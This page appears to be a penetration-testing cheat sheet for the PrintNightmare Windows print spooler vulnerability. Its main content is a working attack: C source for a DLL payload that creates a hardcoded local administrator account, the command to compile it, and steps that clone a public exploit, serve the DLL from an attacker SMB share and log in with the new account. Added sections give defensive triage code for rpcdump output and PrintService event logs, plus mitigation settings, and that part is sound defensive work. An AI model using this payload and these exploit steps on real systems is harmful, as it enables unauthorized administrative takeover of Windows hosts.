PrintNightMare - CVE-2021-34527

Is Spooler active?

```bash
# with nxc (NetExec, formerly cme)
nxc smb $target_ip -M spooler

# with impacket
rpcdump.py @$target_ip | egrep 'MS-RPRN|MS-PAR'
```
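As an added example (not part of the original page and not code from impacket or NetExec), here is a small parser for the rpcdump.py output above that reports which print-spooler interfaces a host exposes over the network. The sample output is constructed in rpcdump's entry layout; the two UUIDs are the interface IDs that spoolsv.exe registers for MS-RPRN and MS-PAR. The domain-controller rule encodes the usual mitigation: a DC has no business running the spooler, so exposure there should be removed by disabling the service rather than filtered.

```python
import re
from dataclasses import dataclass, field

# Interfaces registered by the print spooler (spoolsv.exe): the well-known
# interface UUIDs from MS-RPRN and MS-PAR, lower-cased for comparison.
SPOOLER_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN",
    "76f03f96-cdfd-44fc-a22c-64950a001209": "MS-PAR",
}

# Constructed sample in the layout rpcdump.py prints (one entry per interface,
# entries separated by a blank line). Host name and addresses are made up.
SAMPLE_RPCDUMP = """\
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.168.56.10[49670]
          ncalrpc:[LRPC-2d1e0c7b8a]
          ncacn_np:\\\\DC01[\\pipe\\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:192.168.56.10[49670]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:192.168.56.10[49668]
"""


@dataclass
class Endpoint:
    protocol: str
    uuid: str
    bindings: list = field(default_factory=list)


def parse_rpcdump(text):
    """Split rpcdump output into Endpoint records (entries are blank-line separated)."""
    endpoints = []
    for chunk in re.split(r"\n[ \t]*\n", text.strip()):
        proto = re.search(r"Protocol:\s*(?:\[(MS-[A-Z0-9]+)\])?", chunk)
        uuid = re.search(r"UUID\s*:\s*([0-9A-Fa-f-]{36})", chunk)
        if not uuid:
            continue
        name = proto.group(1) if proto and proto.group(1) else "N/A"
        ep = Endpoint(protocol=name, uuid=uuid.group(1).lower())
        in_bindings = False
        for line in chunk.splitlines():
            if line.strip().startswith("Bindings:"):
                in_bindings = True
                continue
            if in_bindings and line.strip():
                ep.bindings.append(line.strip())
        endpoints.append(ep)
    return endpoints


def spooler_exposure(text):
    """Map spooler interface name -> network-reachable bindings (SMB pipe or TCP).

    Local-only bindings (ncalrpc) are ignored: they cannot be reached remotely."""
    exposed = {}
    for ep in parse_rpcdump(text):
        name = SPOOLER_INTERFACES.get(ep.uuid)
        if name is None:
            continue
        remote = [b for b in ep.bindings if b.startswith(("ncacn_np:", "ncacn_ip_tcp:"))]
        if remote:
            exposed[name] = remote
    return exposed


def triage(text, is_domain_controller):
    """Turn exposure into human-readable findings for the host the output came from."""
    findings = []
    exposed = spooler_exposure(text)
    for name, bindings in sorted(exposed.items()):
        findings.append(f"{name} reachable remotely via {', '.join(bindings)}")
    if exposed and is_domain_controller:
        findings.append("spooler exposed on a domain controller: disable the Print Spooler service here")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_RPCDUMP, is_domain_controller=True):
        print(line)
```

Feed it the raw rpcdump.py output for each host (for example, saved with `rpcdump.py @$target_ip > host.txt`) and pass `is_domain_controller` from your inventory; a host that shows only `ncalrpc` bindings for the spooler is not reachable over the network through this path.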

Prepare the exploit

Here is the DLL we will use: it creates a user and adds it to the local Administrators group ☺️

nightmare.c
```c
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload: create a local user and add it to the local Administrators group.
   It runs with the privileges of the process that loads the DLL. */
int RunCMD()
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:   /* first load of the DLL into the process */
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

Compile it:

```bash
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
```

Exploit it:

```bash
# clone the repo
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare

# prepare an SMB share with nightmare.dll inside
smbserver.py -smb2support share .

# exploit
python3 CVE-2021-1675.py $domain/$user:$password@$hostnameanddomainname '\\192.168.56.1\share\nightmare.dll'

# verify
cme smb $target_ip -u pnightmare -p 'Passw0rd123.'
```
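On the receiving end, the driver install this exploit performs leaves traces in the Microsoft-Windows-PrintService logs: event 316 (a printer driver was added or updated, with the list of files it shipped) and event 808 (the spooler failed to load a plug-in module). The following is an added example, not from the original page or the referenced repository, of triage logic over such records. The sample events are constructed to approximate the real message text, the driver-file allowlist is a placeholder that a real deployment would build from its approved drivers, and the two parsers assume that message layout.

```python
import re

# Constructed sample records approximating entries from the PrintService logs.
# A real export (e.g. Get-WinEvent piped to Export-Csv) carries more fields;
# only Id and Message are used here. The driver name "1234" and nightmare.dll
# mirror what an attacker-supplied driver install would leave behind.
SAMPLE_EVENTS = [
    {"Id": 316, "Message": "Printer driver Microsoft XPS Document Writer v4 for Windows x64 "
                           "Version-4 was added or updated. Files:- mxdwdrv.dll, PS5UI.DLL, "
                           "pscript5.dll. No user action is required."},
    {"Id": 316, "Message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                           "Files:- UNIDRV.DLL, kernelbase.dll, nightmare.dll. "
                           "No user action is required."},
    {"Id": 808, "Message": "The print spooler failed to load a plug-in module "
                           "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\nightmare.dll, "
                           "error code 0x45A. See the event user data for context information."},
    {"Id": 372, "Message": "The document Print Document, owned by alice, failed to print."},
]

# Placeholder baseline of driver files this fleet is expected to install
# (lower-cased). Build the real one from an inventory of approved drivers.
KNOWN_DRIVER_FILES = {"mxdwdrv.dll", "ps5ui.dll", "pscript5.dll", "unidrv.dll", "kernelbase.dll"}


def driver_files(message):
    """Extract the 'Files:- a, b, c.' list from an event 316 message (lower-cased)."""
    _, sep, rest = message.partition("Files:-")
    if not sep:
        return []
    rest = re.sub(r"\.?\s*No user action is required\.?\s*$", "", rest)
    return [f.strip().lower().rstrip(".") for f in rest.split(",") if f.strip()]


def plugin_path(message):
    """Extract the module path from an event 808 message, or None if absent."""
    m = re.search(r"failed to load a plug-in module\s+(.+?),\s*error code", message)
    return m.group(1) if m else None


def triage_print_events(events, known_files=KNOWN_DRIVER_FILES):
    """Return (event id, reason) findings for records that deserve an analyst's look.

    316: flag only when the install shipped files outside the allowlist.
    808: always flag; a healthy spooler rarely fails to load a plug-in."""
    findings = []
    for ev in events:
        eid, msg = ev["Id"], ev["Message"]
        if eid == 316:
            unknown = [f for f in driver_files(msg) if f not in known_files]
            if unknown:
                findings.append((316, f"driver install shipped unknown files: {', '.join(unknown)}"))
        elif eid == 808:
            path = plugin_path(msg) or "<unparsed>"
            findings.append((808, f"spooler failed to load plug-in {path}"))
    return findings


if __name__ == "__main__":
    for eid, reason in triage_print_events(SAMPLE_EVENTS):
        print(eid, reason)
```

The complementary mitigation is to disable the Print Spooler service wherever printing is not needed (domain controllers above all) and, where it is, keep the Point and Print driver-installation restriction enabled (`RestrictDriverInstallation` = 1 under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint`), so that non-administrators cannot add drivers in the first place.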
